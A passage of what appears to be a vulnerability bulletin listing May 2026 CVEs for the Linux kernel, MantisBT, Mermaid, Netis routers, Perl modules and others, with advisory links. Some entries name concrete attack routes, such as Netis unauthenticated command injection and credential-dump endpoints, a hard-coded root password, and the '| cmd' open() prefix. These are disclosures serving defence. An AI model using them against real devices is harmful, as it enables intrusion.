TASK_UNINTERRUPTIBLE for them; [4] fixed the wait's condition; [5] made nr_dying_subsys_* visible synchronously. The cgroup_drain_dying() wait in [3] turned out to be a dead end. When the rmdir caller is also the reaper of a zombie that pins a pidns teardown (e.g. host PID 1 systemd reaping orphan pids that were re-parented to it during the same teardown), rmdir blocks in TASK_UNINTERRUPTIBLE waiting for those pids to free, the pids can't free because PID 1 is the reaper and it's stuck in rmdir, and the system A-A deadlocks. No internal lock ordering breaks this; the wait itself is the bug. The css killing side that drove the original reorder, however, can be made cleanly asynchronous: ->css_offline() is already async, run from css_killed_work_fn() driven by percpu_ref_kill_and_confirm(). The fix is to make that chain start only after all tasks have left the cgroup. rmdir's user-visible side then returns as soon as cgroup.procs and friends are empty, while ->css_offline() still runs only after the cgroup is fully drained. Verified by the original reproducer (pidns teardown + zombie reaper, runs under vng) which hangs vanilla and succeeds here, and by per-commit deterministic repros for [2], [3], [4], [5] with a boot parameter that widens the post-exit_signals() window so each state is reliably reachable. Some stress tests on top of that. cgroup_apply_control_disable() has the same shape of pre-existing race: when a controller is disabled via subtree_control, kill_css() ran synchronously while tasks past exit_signals() could still be linked to the cgroup's csets, and ->css_offline() could fire before they drained. This patch preserves the existing synchronous behavior at that call site (kill_css_sync() + kill_css_finish() back-to-back) and a follow-up patch will defer kill_css_finish() there using a per-css trigger. This seems like the right approach and I don't see problems with it. The changes are somewhat invasive but not excessively so, so backporting to -stable should be okay. If something does turn out to be wrong, the fallback is to revert the entire chain ([1]-[5]) and rework in the development branch instead. v2: Pin cgrp across the deferred destroy work with explicit cgroup_get()/cgroup_put() around queue_work() and the work_fn. v1 wasn't actually broken (ordered cgroup_offline_wq + queue_work order in cgroup_task_dead() saved it) but the explicit ref removes the dependency on those non-obvious invariants. Also note the pre-existing cgroup_apply_control_disable() race in the description; a follow-up will defer kill_css_finish() there. | 2026-05-28 | not yet calculated | CVE-2026-46223 | https://git.kernel.org/stable/c/33fa2e6b1507a0a377a151a8826438bedad1d0b0 https://git.kernel.org/stable/c/93618edf753838a727dbff63c7c291dee22d656b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix bo leak in xe_dma_buf_init_obj() on allocation failure When drm_gpuvm_resv_object_alloc() fails, the pre-allocated storage bo is not freed. Add xe_bo_free(storage) before returning the error. xe_dma_buf_init_obj() calls xe_bo_init_locked(), which frees the bo on error. Therefore, xe_dma_buf_init_obj() must also free the bo on its own error paths. Otherwise, since xe_gem_prime_import() cannot distinguish whether the failure originated from xe_dma_buf_init_obj() or from xe_bo_init_locked(), it cannot safely decide whether the bo should be freed. Add comments documenting the ownership semantics: on success, ownership of storage is transferred to the returned drm_gem_object; on failure, storage is freed before returning. v2: Add comments to explain the free logic. (cherry picked from commit 78a6c5f899f22338bbf48b44fb8950409c5a69b9) | 2026-05-28 | not yet calculated | CVE-2026-46224 | https://git.kernel.org/stable/c/f9ad21b90162baf1d78f8036ff3813c3ec1ac88e https://git.kernel.org/stable/c/8fa8c2a22585fcb31dc605b91a67bbcca223fdd7 https://git.kernel.org/stable/c/93a528f67ce5095bcab46a69839eca97f43dd352 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: rspi: fix controller deregistration Make sure to deregister the controller before releasing underlying resources like DMA during driver unbind. | 2026-05-28 | not yet calculated | CVE-2026-46225 | https://git.kernel.org/stable/c/77defd64b405b680db73d767313fce770d368368 https://git.kernel.org/stable/c/c5090db1b31de3ef4db0cda7e822ab49cb572292 https://git.kernel.org/stable/c/aee76c1dd189562c6678313caec12761f78a9ef3 https://git.kernel.org/stable/c/fee6abd9845c3edd217b0e429d09f764f9a5690e https://git.kernel.org/stable/c/9944fa6726afb1e6eb7e2212764e7da0c97f2dcc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: fsl: fix controller deregistration Make sure to deregister the controller before releasing underlying resources like DMA during driver unbind. | 2026-05-28 | not yet calculated | CVE-2026-46226 | https://git.kernel.org/stable/c/562d954a144950ec2aa6a874ae657cb3fa31fe53 https://git.kernel.org/stable/c/e888308222375ac28bae69134dae288178718a96 https://git.kernel.org/stable/c/ca3195c7b88362d7c81efe685948663a9f9db0e6 https://git.kernel.org/stable/c/5750743a39c9d46ac9fcf57ffe000956da4942cf https://git.kernel.org/stable/c/9b7abfed4c3754062d1f3ffd452e65a38667f586 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: ch341: fix devres lifetime USB drivers bind to USB interfaces and any device managed resources should have their lifetime tied to the interface rather than parent USB device. This avoids issues like memory leaks when drivers are unbound without their devices being physically disconnected (e.g. on probe deferral or configuration changes). Fix the controller and driver data lifetime so that they are released on driver unbind. Note that this also makes sure that the SPI controller is placed correctly under the USB interface in the device tree. | 2026-05-28 | not yet calculated | CVE-2026-46228 | https://git.kernel.org/stable/c/4422fc2411cbbdf5104a914e0596bb483faea254 https://git.kernel.org/stable/c/108a64b27a52f781c4f3751641e3dd65c7dd2fb5 https://git.kernel.org/stable/c/abe572f630bc1f0e77041012ab075869036ede4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Clear VRAM on allocation to prevent stale data exposure KFD VRAM allocations set AMDGPU_GEM_CREATE_VRAM_WIPE_ON_RELEASE but not AMDGPU_GEM_CREATE_VRAM_CLEARED, leaving freshly allocated VRAM with stale data from prior use observable by compute kernels. The GEM ioctl path already sets VRAM_CLEARED for all userspace allocations via amdgpu_gem_create_ioctl() and amdgpu_mode_dumb_create(). The KFD path was missing this flag, allowing stale page table remnants to leak into user buffers. This causes crashes in RCCL P2P transport where non-zero data in ptrExchange/head/tail fields corrupts the protocol handshake. | 2026-05-28 | not yet calculated | CVE-2026-46229 | https://git.kernel.org/stable/c/1db431380879fd9d28b763a88a0c0431be5be8df https://git.kernel.org/stable/c/32b153658f017ad2f5bf8aab479e8d16ac95bc3a https://git.kernel.org/stable/c/77d0b5d11387071770246fd0185a69fa28e8e109 https://git.kernel.org/stable/c/047d44d8d29a6a1a5757256837aa9dd78e3cd0b5 https://git.kernel.org/stable/c/ad52d61d82181dbdb7f05826de38352d5e550cc2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: bla: put backbone reference on failed claim hash insert When batadv_bla_add_claim() fails to insert a new claim into the hash, it leaked a reference to the backbone_gw for which the claim was intended. Call batadv_backbone_gw_put() on the error path to release the reference and avoid leaking the backbone_gw object. | 2026-05-28 | not yet calculated | CVE-2026-46231 | https://git.kernel.org/stable/c/65419eb4259a26a3cd3f56fa0e3b3c113bf8c256 https://git.kernel.org/stable/c/fd0ca034c1e71ca7613cde9dd892836b2c2831bd https://git.kernel.org/stable/c/0baf4b659cdc7305cf685b5a5d60f9e3816ab5d0 https://git.kernel.org/stable/c/7cccf4eb4f96d3c3af91a00b7a9caa652439542e https://git.kernel.org/stable/c/ba9d20ee9076dac32c371116bacbe72480eb356c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: batman-adv: bla: only purge non-released claims When batadv_bla_purge_claims() goes through the list of claims, it is only traversing the hash list with an rcu_read_lock(). Due to a potential parallel batadv_claim_put(), it can happen that it encounters a claim which was actually in the process of being released+freed by batadv_claim_release(). In this case, backbone_gw is set to NULL before the delayed RCU kfree is started. Calling batadv_bla_claim_get_backbone_gw() is then no longer allowed because it would cause a NULL-ptr derefence. To avoid this, only claims with a valid reference counter must be purged. All others are already taken care of. | 2026-05-28 | not yet calculated | CVE-2026-46233 | https://git.kernel.org/stable/c/7b8fbcee3184d848b5aee085ca16d0cf05c9b641 https://git.kernel.org/stable/c/7b7ebb7222a5524ce58e48cc9c6d688320ea6cfe https://git.kernel.org/stable/c/b65365d2b1e6095c538d49baeb140dd1c166c1b3 https://git.kernel.org/stable/c/ab3dbd07a809a8eb30c7ddfab9ac886ed30dce8d https://git.kernel.org/stable/c/cf6b604011591865ae39ac82de8978c1120d17af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vsock: fix buffer size clamping order In vsock_update_buffer_size(), the buffer size was being clamped to the maximum first, and then to the minimum. If a user sets a minimum buffer size larger than the maximum, the minimum check overrides the maximum check, inverting the constraint. This breaks the intended socket memory boundaries by allowing the vsk->buffer_size to grow beyond the configured vsk->buffer_max_size. Fix this by checking the minimum first, and then the maximum. This ensures the buffer size never exceeds the buffer_max_size. | 2026-05-28 | not yet calculated | CVE-2026-46234 | https://git.kernel.org/stable/c/a998a7e250bf976539e05a00ec64a81292afecaa https://git.kernel.org/stable/c/310da27932dd0afe7ce7456dfe1f0814c3301f41 https://git.kernel.org/stable/c/2602f7bb5818e92315feeaeb71d8ce4d5c9ab160 https://git.kernel.org/stable/c/0b68881501460c3761f196469e1e503218c5e536 https://git.kernel.org/stable/c/d114bfdc9b76bf93b881e195b7ec957c14227bab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: saa7164: add ioremap return checks and cleanups Add checks for ioremap return values in saa7164_dev_setup(). If ioremap for BAR0 or BAR2 fails, release the already allocated PCI memory regions, remove the device from the global list, decrement the device count, and return -ENODEV. This prevents potential null pointer dereferences and ensures proper cleanup on memory mapping failures. | 2026-05-28 | not yet calculated | CVE-2026-46235 | https://git.kernel.org/stable/c/3ce8f3057c51bb0a66aa3fab0862be74e9f88684 https://git.kernel.org/stable/c/a9b83f46e52cf1239d780920d1a7a3e415f7b5d9 https://git.kernel.org/stable/c/6047dc542fa404b5c187cc2c7906aaaaec6d11ed https://git.kernel.org/stable/c/6c22a6d8e4c1507bba504aeebe80476144a373eb https://git.kernel.org/stable/c/d51c60a498e83c9a79884c8e420f97e3885c9583 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rc: xbox_remote: heed DMA restrictions The buffer for IO must not be part of the device structure because that violates the DMA coherency rules. | 2026-05-28 | not yet calculated | CVE-2026-46236 | https://git.kernel.org/stable/c/0cc9251833bf02c8c7863404157c94dab5928fcf https://git.kernel.org/stable/c/48a668c22e8f92637bc496e84d1cf06900f74a5c https://git.kernel.org/stable/c/63a960b39de9c51f29ca19aa5067934f865c0bc7 https://git.kernel.org/stable/c/0bd8ac88ec5f74cd0f4b8cfc54f4cc0827007249 https://git.kernel.org/stable/c/e280d1e5e3f2595bbb43fe6e1bce00c59a43c0ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c: ov5647: Fix runtime PM refcount leak in s_ctrl Three control cases (AUTOGAIN, EXPOSURE_AUTO, ANALOGUE_GAIN) directly return without calling pm_runtime_put(), causing runtime PM reference count leaks. Change these cases from 'return' to 'ret = ... break' pattern to ensure pm_runtime_put() is always called before function exit. | 2026-05-28 | not yet calculated | CVE-2026-46239 | https://git.kernel.org/stable/c/6b03ecf75bda5900b8e661eb75656f631b598bc2 https://git.kernel.org/stable/c/f11ae9c04f8368a3b5a0280ef595198dace1c983 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: mpc52xx: fix use-after-free on registration failure Make sure to disable and free the interrupts in case controller registration fails to avoid a potential use-after-free and resource leak. This issue was flagged by Sashiko when reviewing a controller deregistration fix. | 2026-05-28 | not yet calculated | CVE-2026-46241 | https://git.kernel.org/stable/c/8b49b6aadd0c622ca7d68b4a53ae10362e221cf3 https://git.kernel.org/stable/c/336d9ad7560b3baba17af06727a888040ee93390 https://git.kernel.org/stable/c/5c77f11b9b5f1ad5a704dad875260c44016ede10 https://git.kernel.org/stable/c/f62c060272b9d7423b1650b844e8e4e7b8f9f925 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: eventpoll: fix ep_remove struct eventpoll / struct file UAF ep_remove() (via ep_remove_file()) cleared file->f_ep under file->f_lock but then kept using @file inside the critical section (is_file_epoll(), hlist_del_rcu() through the head, spin_unlock). A concurrent __fput() taking the eventpoll_release() fastpath in that window observed the transient NULL, skipped eventpoll_release_file() and ran to f_op->release / file_free(). For the epoll-watches-epoll case, f_op->release is ep_eventpoll_release() -> ep_clear_and_put() -> ep_free(), which kfree()s the watched struct eventpoll. Its embedded ->refs hlist_head is exactly where epi->fllink.pprev points, so the subsequent hlist_del_rcu()'s "*pprev = next" scribbles into freed kmalloc-192 memory. In addition, struct file is SLAB_TYPESAFE_BY_RCU, so the slot backing @file could be recycled by alloc_empty_file() -- reinitializing f_lock and f_ep -- while ep_remove() is still nominally inside that lock. The upshot is an attacker-controllable kmem_cache_free() against the wrong slab cache. Pin @file via epi_fget() at the top of ep_remove() and gate the critical section on the pin succeeding. With the pin held @file cannot reach refcount zero, which holds __fput() off and transitively keeps the watched struct eventpoll alive across the hlist_del_rcu() and the f_lock use, closing both UAFs. If the pin fails @file has already reached refcount zero and its __fput() is in flight. Because we bailed before clearing f_ep, that path takes the eventpoll_release() slow path into eventpoll_release_file() and blocks on ep->mtx until the waiter side's ep_clear_and_put() drops it. The bailed epi's share of ep->refcount stays intact, so the trailing ep_refcount_dec_and_test() in ep_clear_and_put() cannot free the eventpoll out from under eventpoll_release_file(); the orphaned epi is then cleaned up there. A successful pin also proves we are not racing eventpoll_release_file() on this epi, so drop the now-redundant re-check of epi->dying under f_lock. The cheap lockless READ_ONCE(epi->dying) fast-path bailout stays. | 2026-05-30 | not yet calculated | CVE-2026-46242 | https://git.kernel.org/stable/c/ef4ca02e95363e78977ca04340d44fe3b4b2b81f https://git.kernel.org/stable/c/ced39b6a8062bac5c18a1c3df85634107eb8664a https://git.kernel.org/stable/c/a6dc643c69311677c574a0f17a3f4d66a5f3744b |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. From 1.0.0 to 2.28.1, lack of validation of filter_target parameter on return_dynamic_filters.php (normally used as an AJAX in View Issues Page) allows an attacker to inject arbitrary HTML if the target is a TEXTAREA custom field. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-41897 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-j7v9-f46r-2rp4 https://github.com/mantisbt/mantisbt/commit/c885af13f0b8596714ffe11df757c09f35fbd8f4 https://mantisbt.org/bugs/view.php?id=37013 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. From 1.0.0 to 2.28.1, lack of validation of filter_target parameter on return_dynamic_filters.php (normally used as an AJAX in View Issues Page) allows an attacker to inject arbitrary HTML if the target is a TEXTAREA custom field. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-41897 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-j7v9-f46r-2rp4 https://github.com/mantisbt/mantisbt/commit/c885af13f0b8596714ffe11df757c09f35fbd8f4 https://mantisbt.org/bugs/view.php?id=37013 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Prior to 2.28.2, the mc_issue_update() function in MantisBT allows users having update_bug_threshold access (UPDATER, with default settings) to edit, change view state, and modify time tracking on bugnotes belonging to other users - bypassing the default DEVELOPER (level 55) threshold required by the dedicated mc_issue_note_update() function. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-42070 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-pq86-j2c2-47f6 https://github.com/mantisbt/mantisbt/commit/6e58fae4f22efdc3987f903c8ba2611de17a9435 https://mantisbt.org/bugs/view.php?id=37089 https://mantisbt.org/bugs/view.php?id=37093 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. From 2.23.0 to 2.28.1, a missing authorization check in MantisBT's file visibility function allows any authenticated user (REPORTER+) to download attachments on private bugnotes they should not be able to access, via the REST API endpoint GET /api/rest/issues/{id}/files and SOAP API mc_issue_attachment_get endpoint. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-42071 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-pw5x-2mf9-3xc8 https://github.com/mantisbt/mantisbt/commit/029d9d203d9e4ae96b3e59d552fa7395cc1e5071 https://mantisbt.org/bugs/view.php?id=27039 https://mantisbt.org/bugs/view.php?id=36985 https://mantisbt.org/bugs/view.php?id=37092 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. From 1.3.0 to 2.28.1, unescaped Project Name allows an attacker that can set it (which typically requires manager or administrator access level) to inject HTML in Move Attachments admin page. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-44655 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-7mqj-8gj2-cg59 https://github.com/mantisbt/mantisbt/commit/5cb4b469295889f5d2b01677c9bf82c143e0fdaa |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Prior to 2.28.2, using show_inline=1 parameter and a valid file_show_inline_token CSRF token on file_download.php, an attacker can execute code by uploading a crafted XHTML attachment referencing a JavaScript attachment. This vulnerability is fixed in 2.28.2. | 2026-05-28 | not yet calculated | CVE-2026-44657 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-p6fr-rxq7-xcg8 https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3 https://github.com/mantisbt/mantisbt/commit/26647b2e68ba30b9d7987d4e03d7a16416684bc2 https://mantisbt.org/bugs/view.php?id=37020 |
| mapfish--mapfish-print | mapfish-print is a component of MapFish for printing templated cartographic maps. From 3.23.0 to before 3.28.28, 3.30.30, 3.31.22, 3.33.14, and 4.0.3, the attacker can execute arbitrary code in Dynamic table without being authenticated. This vulnerability is fixed in 3.28.28, 3.30.30, 3.31.22, 3.33.14, and 4.0.3. | 2026-05-28 | not yet calculated | CVE-2026-44672 | https://github.com/mapfish/mapfish-print/security/advisories/GHSA-q7m6-wpvf-mvwx |
| markmhendrickson--neotoma | Neotoma provides versioned records that persist across agent runs. From 0.6.0 to before 0.11.1, Neotoma can treat public reverse-proxied requests as local when the app receives them over a loopback socket and no Bearer token is present. In affected deployments, the REST auth middleware can resolve unauthenticated requests as the local development user, making the hosted Inspector and related API surface reachable without credentials. This vulnerability is fixed in 0.11.1. | 2026-05-29 | not yet calculated | CVE-2026-45577 | https://github.com/markmhendrickson/neotoma/security/advisories/GHSA-5cvp-p7p4-mcx9 https://github.com/markmhendrickson/neotoma/releases/tag/v0.11.1 |
| Mennekes--Amtron | The Mennekes Amtron series (firmware versions ≤ 5.22.3) is vulnerable to an authentication bypass. An unauthenticated remote attacker can change the password of the user account via a crafted POST request to the /operator/operator endpoint. | 2026-05-28 | not yet calculated | CVE-2026-8979 | https://cyberdanube.com/security-research/multiple-vulnerabilities-in-mennekes-amtron-series/ |
| Mennekes--Amtron | The Mennekes Amtron series (firmware versions ≤ 5.22.3) is vulnerable to privilege escalation. An authenticated low-privileged user can change the passwords of the admin (operator) and manufacturer accounts via crafted POST requests. | 2026-05-28 | not yet calculated | CVE-2026-8980 | https://cyberdanube.com/security-research/multiple-vulnerabilities-in-mennekes-amtron-series/ |
| mermaid-js--mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, there is a denial-of-service attack when rendering gantt charts, if they use the excludes attribute to exclude all dates. mermaid.parse is unaffected, unless you then call the ganttDb.getTasks() (which is called when rendering a diagram). This vulnerability is fixed in 10.9.6 and 11.15.0. | 2026-05-29 | not yet calculated | CVE-2026-41150 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh https://github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6 https://github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0 https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6 |
| mermaid-js--mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis's & (scope reference) handling. :not(&) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0. | 2026-05-29 | not yet calculated | CVE-2026-41159 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76 https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0 https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6 |
| MIK--Crypt::ScryptKDF | Crypt::ScryptKDF versions through 0.010 for Perl uses insecure random number source when no CSPRNG module is available. The random_bytes function fell back to using the built-in rand() function when none of the Perl modules Crypt::PRNG, Crypt::OpenSSL::Random, Net::SSLeay, Crypt::Random, or Bytes::Random::Secure were available. | 2026-05-26 | not yet calculated | CVE-2026-8647 | https://metacpan.org/release/MIK/Crypt-ScryptKDF-0.011/changes https://metacpan.org/release/MIK/Crypt-ScryptKDF-0.011/diff/MIK/Crypt-ScryptKDF-0.010#lib/Crypt/ScryptKDF.pm |
| MIK--CryptX | CryptX versions before 0.088_001 for Perl have a stack buffer overflow in four AEAD decrypt_verify helpers. The gcm_decrypt_verify, ccm_decrypt_verify, chacha20poly1305_decrypt_verify and eax_decrypt_verify XS routines copied the caller-supplied authentication tag into a fixed 144-byte stack buffer (MAXBLOCKSIZE) without checking the supplied length. A longer tag overwrites the stack past the buffer. Version 0.088 added the clamp to gcm_decrypt_verify, and 0.088_001 added it to the other three. Any caller of an affected helper that forwards an attacker-controlled tag longer than the buffer can trigger the overflow. | 2026-05-28 | not yet calculated | CVE-2026-41565 | https://github.com/DCIT/perl-CryptX/commit/57e69e541b0718ca8724c2f61514322a2d859bc1.patch https://github.com/DCIT/perl-CryptX/commit/7e56347d420aaf43b2ee1586f4a230492ccf1642.patch https://metacpan.org/release/MIK/CryptX-0.088_001 |
| misp--cti-transmute | A stored cross-site scripting (XSS) vulnerability exists in the notification panel of CTI Transmute in versions prior to the patched release. Notification messages containing user-controlled convert names were rendered in the notification bell dropdown using innerHTML without adequate sanitization. An attacker able to create or influence a convert name that is included in a notification could inject arbitrary JavaScript, which would execute in the browser of an authenticated user when they opened the notification panel. Successful exploitation could allow the attacker to perform actions in the victim's session or access information available to the application in the browser context. The issue was remediated by constructing notification elements through DOM methods and assigning notification message content via textContent instead of innerHTML. This vulnerability was only present on a development branch. | 2026-05-28 | not yet calculated | CVE-2026-9806 | https://github.com/MISP/cti-transmute/commit/cf42409badc27b13d9bb644b9175aa7f27e11259 |
| mlflow--mlflow/mlflow | A vulnerability in MLflow versions <=3.10.1.dev0 allows unauthorized access to multipart upload (MPU) endpoints when the `--serve-artifacts` mode is enabled. The authorization logic does not enforce resource-level permission checks for `/mlflow-artifacts/mpu/*` endpoints, enabling attackers to overwrite artifacts belonging to other users. This can lead to unauthorized cross-user writes, model supply chain poisoning, and arbitrary code execution when compromised models are loaded. The issue is resolved in version 3.10.0. | 2026-05-25 | not yet calculated | CVE-2026-2651 | https://huntr.com/bounties/65beb119-d3e0-4e03-af2f-fa98f78f83dc https://github.com/mlflow/mlflow/commit/d7290811d8f3c95366d80109424edc1fb1ad966f |
| Mozilla--Firefox for iOS | Firefox for iOS displayed specially crafted right-to-left (RTL) and internationalized domain names (IDNs) incorrectly in link preview UI surfaces. A crafted RTL hostname could visually reorder portions of the displayed domain, causing attacker-controlled sites to appear as trusted origins. This vulnerability was fixed in Firefox for iOS 151.1. | 2026-05-25 | not yet calculated | CVE-2026-9078 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029371 https://www.mozilla.org/security/advisories/mfsa2026-52/ |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In 0.24.8 and earlier, quic_stream_recv can dereference a null substream pointer when a substream is in reopen state. The code finishes the AIO with error but does not return before locking c->mtx. | 2026-05-29 | not yet calculated | CVE-2026-45151 | https://github.com/nanomq/nanomq/security/advisories/GHSA-9qhf-wgp4-p7w5 |
| NEC Platforms, Ltd.--Aterm MR51FN | An OS Command Injection vulnerability exists in Aterm. If a malicious third person gains administrator access to the product's web console, they may be able to execute arbitrary OS commands via adjacent network. | 2026-05-25 | not yet calculated | CVE-2026-8652 | https://jpn.nec.com/security-info/secinfo/nv26-003_en.html |
| NEC Platforms, Ltd.--Aterm WX1800HP | A cross-site scripting vulnerability exists in Aterm. Arbitrary scripts may be executed in the web browser of a user accessing the web management interface via adjacent network. | 2026-05-25 | not yet calculated | CVE-2026-6059 | https://jpn.nec.com/security-info/secinfo/nv26-002_en.html |
| Netis--AC1200 Router | Netis AC1200 Router NC21 V4.0.1.4296 contains a hard-coded root credential stored in /etc/shadow.sample. The password for the root account is set to the trivially weak value root, allowing an attacker with access to the device to authenticate as root and gain full control of the underlying operating system. | 2026-05-27 | not yet calculated | CVE-2026-36538 | http://netis-system.com https://github.com/sir3ns/cve-disclosure/blob/main/CVE-2026-36538/readme.md |
| Netis--AC1200 Router | Netis AC1200 Router NC21 V4.0.1.4296 exposes a CGI endpoint /cgi-bin/skk_get.cgi that returns the entire router configuration as a JSON response with no authentication required. Any attacker on the LAN can send a single HTTP GET request and instantly retrieve administrator credentials, WiFi passwords, PPPoE credentials, DDNS credentials, and a full map of all connected devices. | 2026-05-27 | not yet calculated | CVE-2026-36539 | https://github.com/sir3ns/cve-disclosure/blob/main/CVE-2026-36539/readme.md |
| Netis--AC1200 Router | Netis AC1200 Router NC21 V4.0.1.4296 is vulnerable to unauthenticated command injection via the /cgi-bin/skk_set.cgi endpoint. The password and new_pwd_confirm POST parameters are passed directly to the underlying OS shell without sanitization. An attacker can inject arbitrary shell commands by wrapping them in backticks (`) and encoding them in base64. Because the endpoint requires no authentication, any device on the LAN can achieve full Remote Code Execution on the router's operating system with a single HTTP POST request. | 2026-05-27 | not yet calculated | CVE-2026-36540 | http://netis-system.com https://github.com/sir3ns/cve-disclosure/blob/main/CVE-2026-36540/readme.md |
| NEZUMI--Text::LineFold | Text::LineFold versions through 2019.001 for Perl duplicate the output based on the number of special break characters. Text::LineFold splits the input string by specific line break characters (such as VT, FF and others) into segments, but applies the break function to the entire string, not just the segment. A side effect of this is that the full input can be duplicated for each segment. Besides being incorrect, this can lead to unexpected resource consumption and possible denial of service. Note that Text::LineFold is part of the Unicode-LineBreak distribution, which may have a higher version number than the module. | 2026-05-30 | not yet calculated | CVE-2026-8594 | https://metacpan.org/release/NEZUMI/Unicode-LineBreak-2019.001/source/lib/Text/LineFold.pm#L407-415 https://security.metacpan.org/patches/U/Unicode-LineBreak/2019.001/CVE-2026-8594-r1.patch https://github.com/hatukanezumi/Unicode-LineBreak/pull/6 |
| Northern.Tech--Mender Client 5 | Northern.tech Mender Client 5 before 5.0.4 allows a Cryptographic signature verification bypass. | 2026-05-27 | not yet calculated | CVE-2025-67903 | https://northern.tech https://mender.io/blog/cve-2025-67903-signature-verification-bypass-in-mender-client |
| Northern.Tech--Mender Enterprise | Northern.tech Mender Enterprise Server before 4.1.1 has Incorrect Access Control. | 2026-05-27 | not yet calculated | CVE-2026-33552 | https://Northern.tech https://mender.io/blog/cve-2026-49009-cve-2026-33552-input-sanitization-and-access-control-issues-in-mender-server |
| Northern.Tech--Mender Server | Northern.tech Mender Server v4.1.0, v4.0.1 and below, and fixed in v4.1.1 and v4.0.2 allows Directory Traversal. | 2026-05-27 | not yet calculated | CVE-2026-49009 | https://northern.tech https://mender.io/blog/cve-2026-49009-cve-2026-33552-input-sanitization-and-access-control-issues-in-mender-server |
| nrwl--nx-console | Nx Console is the user interface for Nx & Lerna. On 19 May 2026, a malicious version of Nx Console, 18.95.0, was published at 12:30 PM UTC and removed soon after at 12:48 PM UTC, leaving it available for ~18 minutes in Visual Studio Marketplace. For OpenVSX, the problem was detected later, and the compromised version was available from 12:33 UTC to 13:09 UTC (~36 minutes). Version 18.100.0 of Nx Console is not compromised and users may remediate by upgrading to that version. | 2026-05-27 | not yet calculated | CVE-2026-48027 | https://github.com/nrwl/nx-console/security/advisories/GHSA-c9j4-9m59-847w https://github.com/nrwl/nx-console/issues/3139 https://nx.dev/blog/nx-console-v18-95-0-postmortem#indicators-of-compromise https://www.stepsecurity.io/blog/nx-console-vs-code-extension-compromised |
| OALDERS--HTTP::Daemon | HTTP::Daemon versions before 6.17 for Perl allow OS command injection via send_file(). send_file() opens its string argument with Perl's 2-arg open(). The 2-arg form interprets magic prefixes: '| cmd' and 'cmd |' open a pipe to a subprocess, '> path' and '>> path' open the path for write or append. Untrusted input passed to send_file() can run OS commands at the daemon process UID. The read-pipe form ('cmd |') also leaks subprocess stdout into the HTTP response body. The write-mode forms can create or truncate files at attacker chosen paths. | 2026-05-27 | not yet calculated | CVE-2026-8450 | https://github.com/libwww-perl/HTTP-Daemon/pull/89 https://github.com/libwww-perl/HTTP-Daemon/commit/945d35141d94490f749640bd4390acd6a2193995.patch https://metacpan.org/release/OALDERS/HTTP-Daemon-6.17/changes |
